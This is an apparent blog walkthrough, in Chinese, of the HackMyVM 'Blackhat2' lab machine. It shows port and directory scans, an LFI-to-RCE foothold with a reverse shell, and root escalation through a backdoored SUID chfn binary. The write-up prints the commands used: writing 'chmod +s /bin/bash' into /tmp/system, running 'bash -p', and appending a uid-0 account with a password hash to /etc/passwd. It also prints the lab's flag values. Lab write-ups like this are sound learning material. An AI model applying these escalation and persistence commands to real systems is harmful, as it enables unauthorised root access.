Pepster'Blog
HackMyVM-Blackhat2-WalkThrough
城南花已开 Lv6
  2025-04-29 10:46:25   2025-06-15 17:23:33    1.3k 字  7 分钟  

信息收集

服务探测

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       VMware, Inc.
192.168.60.2    00:50:56:e4:1a:e5       VMware, Inc.
192.168.60.164  08:00:27:32:51:be       PCS Systemtechnik GmbH
192.168.60.254  00:50:56:e0:e5:17       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.063 seconds (124.09 hosts/sec). 4 responded
export ip=192.168.60.164
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
RustScan: Because guessing isn't hacking.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.164:22
Open 192.168.60.164:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-29 10:31 CST
Initiating ARP Ping Scan at 10:31
Scanning 192.168.60.164 [1 port]
Completed ARP Ping Scan at 10:31, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 10:31
Completed Parallel DNS resolution of 1 host. at 10:31, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 10:31
Scanning 192.168.60.164 [2 ports]
Discovered open port 80/tcp on 192.168.60.164
Discovered open port 22/tcp on 192.168.60.164
Completed SYN Stealth Scan at 10:31, 0.05s elapsed (2 total ports)
Nmap scan report for 192.168.60.164
Host is up, received arp-response (0.00038s latency).
Scanned at 2025-04-29 10:31:46 CST for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:32:51:BE (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.32 seconds
           Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

目录枚举

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
❯ gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -t 50 -x php,html,zip,txt -b 404,403
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.164
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   403,404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html,zip,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 996]
/index.php            (Status: 200) [Size: 996]
/news.php             (Status: 200) [Size: 3418]
/2021                 (Status: 200) [Size: 31875]
/2022                 (Status: 200) [Size: 34213]
/2023                 (Status: 200) [Size: 36067]
Progress: 1038215 / 1038220 (100.00%)
===============================================================
Finished
===============================================================

news.php中可以输入邮箱

image

可以进行发送内容,不过当你点击send,就会打印已发送,这是代码中写死的,伪造已经发送的假象

image

LFI2Rce

我尝试直接修改get请求中的year参数,可以达到绕过年份限制

尝试LFI文件包含,可以正常访问

image

尝试利用php过滤器进行读取,也可以读到内容

利用LFI2Rce进行反弹shell

参考LFI2RCE via PHP Filters - HackTricks

Root提权

监听端口

1
2
3
4
5
6
7
8
9
10
11
❯ penelope.py
[+] Listening for reverse shells on 0.0.0.0:4444 →  127.0.0.1 • 192.168.60.100
➤  🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from blackhat2.hmv-192.168.60.164-Linux-x86_64 😍️ Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12
[+] Logging to /home/Pepster/.penelope/blackhat2.hmv~192.168.60.164_Linux_x86_64/2025_05_15-09_17_10-508.log 📜
───────────────────────────────────────────────────────────────────────────
www-data@blackhat2:/var/www/html$

卧槽,到这就卡住了,靶机里太干净了,啥提示也没有

看了下作者的WP,原来是具有SUID权限的chfn是个后门程序,一般人不会认为此系统程序是后门,隐蔽性很高,不该带有刻板印象

通过dpkg命令得知近期修改过/usr/bin/chfn程序

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
www-data@blackhat2:/home$ dpkg --verify
missing   c /etc/apache2/sites-available/000-default.conf
missing   c /etc/apache2/sites-available/default-ssl.conf
??5?????? c /etc/grub.d/10_linux
??5??????   /usr/bin/chfn
www-data@blackhat2:/home$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/su
/usr/bin/mount
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/umount
www-data@blackhat2:/home$ ls -al /usr/bin/chfn
-rwsr-xr-x 1 root root 169256 Feb 12  2023 /usr/bin/chfn

传到本地分析一下

1
2
3
4
[!] Session detached ⇲

(Penelope)─(Session [1])> download /usr/bin/chfn
[+] Download OK '/home/Pepster/.penelope/blackhat2.hmv~192.168.60.164_Linux_x86_64/downloads/usr/bin/chfn'

image

可以看到通过setgid(0)setuid(0)将进程的组ID、用户ID设置为0(root)

然后利用system调用执行/tmp/system,并通过nohup和重定向将其放到后台运行

所以我们在tmp目录中创建system并且写入命令

1
2
3
4
5
6
7
www-data@blackhat2:/home$ cd /tmp/
www-data@blackhat2:/tmp$ echo "chmod +s /bin/bash">system
www-data@blackhat2:/tmp$ chmod +x system
www-data@blackhat2:/tmp$ /usr/bin/chfn
Changing the user information for root
Enter the new value, or press ENTER for the default
        Full Name [root]: ^C

执行后,通过pspy监测进程,可以看到同时也执行了/tmp/system

1
2
3
4
2025/05/15 03:58:43 CMD: UID=33    PID=12312  | /usr/bin/bash -i
2025/05/15 03:58:43 CMD: UID=0     PID=12313  | /usr/bin/chfn
2025/05/15 03:58:43 CMD: UID=0     PID=12314  | sh -c nohup /tmp/system </dev/null >/dev/null 2>&1 &
2025/05/15 03:58:43 CMD: UID=0     PID=12315  | /bin/sh /tmp/system

bash提权,直接一步到位

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
www-data@blackhat2:/tmp$ ls -al /bin/bash
-rwsr-sr-x 1 root root 1265648 Apr 23  2023 /bin/bash
www-data@blackhat2:/tmp$ bash -p
bash-5.2# whoami
root
bash-5.2# echo 'primary:zSZ7Whrr8hgwY:0:0::/root:/bin/bash'>>/etc/passwd
bash-5.2# exit
exit
www-data@blackhat2:/tmp$ su primary
Password:
root@blackhat2:/tmp#
root@blackhat2:/tmp# cat /root/root.txt
30f55e2f86961a07e3a181a82f602ed6
root@blackhat2:/tmp# cat /home/sml/user.txt
156532dab679edf6f8e53c8787a09264
  1. 信息收集
    1. 服务探测
    2. LFI2Rce
  2. Root提权
总字数 633.1k
© 2024 - 2025    城南花已开
由 Hexo 驱动 & 主题 Keep
本站由 提供部署服务
  1. 信息收集
    1. 服务探测
    2. LFI2Rce
  2. Root提权